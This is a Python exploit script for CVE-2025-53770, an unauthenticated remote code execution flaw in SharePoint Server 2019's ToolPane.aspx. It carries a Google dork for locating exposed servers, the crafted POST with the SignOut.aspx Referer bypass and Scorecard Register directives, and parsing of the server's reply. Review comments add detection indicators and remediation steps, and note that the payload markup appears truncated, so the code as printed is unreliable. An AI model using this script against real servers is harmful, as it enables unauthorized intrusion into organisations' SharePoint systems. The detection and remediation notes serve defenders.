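#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE)
# Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx"
# Date: 2025-08-07
# Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot)
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
# Version: SharePoint Server 2019 (16.0.10383.20020)
# Tested on: Windows Server 2019 (x64)
# CVE: CVE-2025-53770

"""
Exploit Author: Agampreet Singh (RedRoot Tool Maker)
RedRoot Repository: https://github.com/Agampreet-Singh/RedRoot

This PoC demonstrates unauthenticated RCE by exploiting unsafe deserialization
in SharePoint’s ToolPane.aspx via the Scorecard:ExcelDataSet control.

FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.

What the code below actually does: it sends one POST to ToolPane.aspx, looks
for a CompressedDataTable attribute in the response body, base64-decodes and
gunzips that value, and writes the decoded text to a local file. It does not
run any command on the target itself.

Request shape to look for in IIS / WAF / proxy telemetry (all taken from this
script): POST to /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx,
a Referer of /_layouts/SignOut.aspx, and the form fields MSOTlPn_Uri and
MSOTlPn_DWP (the latter carrying "<%@ Register" directives).

Remediation for CVE-2025-53770 per Microsoft's guidance: install the
SharePoint security updates, enable AMSI integration, and rotate the ASP.NET
machine keys (followed by an IIS restart) on servers that were exposed.
"""

import base64
import gzip
import re
import sys
import tempfile

import requests


def exploit_sharepoint(target_url):
    """Send the ToolPane.aspx request to *target_url* and decode the reply.

    Args:
        target_url: Base URL of the SharePoint site, without a trailing slash
            (the caller strips it).

    Returns:
        None. Progress and errors are printed; the decoded response fragment
        is written to a freshly created temporary file whose path is printed.
    """
    print(f"[+] Target: {target_url}")

    # The SignOut.aspx Referer is the part of this request that the published
    # CVE-2025-53770 write-ups tie to the authentication bypass; it is also a
    # stable string to alert on.
    headers = {
        "Referer": "/_layouts/SignOut.aspx",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # NOTE(review): as printed on this page the markup holds only the two
    # Register directives and nothing after them, so the listing appears to
    # be truncated. The response parsing below expects output that this
    # markup alone would presumably not produce.
    payload = (
        '<%@ Register Tagprefix="Scorecard" '
        'Namespace="Microsoft.PerformancePoint.Scorecards" '
        'Assembly="Microsoft.PerformancePoint.Scorecards.Client, '
        'Version=16.0.0.0, Culture=neutral, '
        'PublicKeyToken=71e9bce111e9429c" %> '
        '<%@ Register Tagprefix="asp" Namespace="System.Web.UI" '
        'Assembly="System.Web.Extensions, Version=4.0.0.0, '
        'Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>'
    )

    data = {
        "MSOTlPn_Uri": target_url,
        "MSOTlPn_DWP": payload
    }

    try:
        # verify=False turns off TLS certificate validation, so the identity
        # of the responding host is not checked and everything read from the
        # response must be treated as untrusted.
        response = requests.post(
            f"{target_url}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
            headers=headers,
            data=data,
            verify=False,
            timeout=10
        )

        if response.status_code != 200:
            print(f"[-] Unexpected HTTP response: {response.status_code}")
            return

        match = re.search(r'CompressedDataTable="([^&]+)', response.text)
        if not match:
            print("[-] No CompressedDataTable found in response.")
            return

        compressed_b64 = match.group(1)
        print("[+] Compressed payload extracted.")

        # NOTE(review): the value comes from the remote server and is
        # decompressed without a size limit; a hostile or decoy endpoint
        # could return a very large expansion.
        compressed_data = base64.b64decode(compressed_b64)
        decompressed_data = gzip.decompress(compressed_data)
        decoded_output = decompressed_data.decode('utf-8', errors='ignore')

        print("[+] Payload decoded successfully. Dumping to file...")

        # Create the output file with a unique name and owner-only
        # permissions instead of opening a fixed path under /tmp, which
        # would follow a pre-planted symlink on a shared machine.
        with tempfile.NamedTemporaryFile(
            mode="w",
            encoding="utf-8",
            prefix="sharepoint_decoded_payload_",
            suffix=".txt",
            delete=False,
        ) as f:
            f.write(decoded_output)
            output_file = f.name

        print(f"[+] Saved to {output_file}")

        print("[*] Summary Matches:")
        for keyword in ["IntruderScannerDetectionPayload", "ExcelDataSet", "divWaiting", "ProgressTemplate", "Scorecard"]:
            if keyword in decoded_output:
                print(f"  - Found: {keyword}")

    except Exception as e:
        # Top-level boundary of the script: network, decoding and file
        # errors are all reported the same way rather than raising.
        print(f"[!] Exploit failed: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 cve-2025-53770.py https://target.com")
        sys.exit(1)

    target = sys.argv[1].strip().rstrip('/')
    exploit_sharepoint(target)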